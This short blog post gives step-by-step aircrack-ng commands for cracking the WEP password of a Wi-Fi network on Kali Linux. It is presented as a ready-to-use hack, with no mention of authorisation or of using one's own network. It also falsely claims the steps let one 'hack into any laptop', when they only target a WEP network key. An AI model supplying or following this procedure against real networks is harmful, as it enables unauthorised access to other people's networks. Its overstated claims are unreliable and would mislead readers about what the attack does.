Crack Wifi Password (WEP) with Kali Linux



wep hack

We can easily crack Wifi (WEP security) by using Kali Linux in approximately 10-15 min by following these steps give below.
  

Open terminal and follow the following procedure to hack into any laptop

Steps:

1. Find out the name of your wireless adapter by typing:
    ifconfig

2. Enable Monitor mode by typing:
    airmon-ng start wlan0

3. Start capturing packets by typing:
    airodump-ng mon0

4. Store the captured packets in a file by typing:
    airodump-ng mon0 --write name_of_file

5. Crack the wifi after 10000 packets minimum by typing:
    aircrack-ng name_of_file-01.cap



Note:
1.Only wep type wifi password can cracked using these step.
2. If you have any problem comment below.


EmoticonEmoticon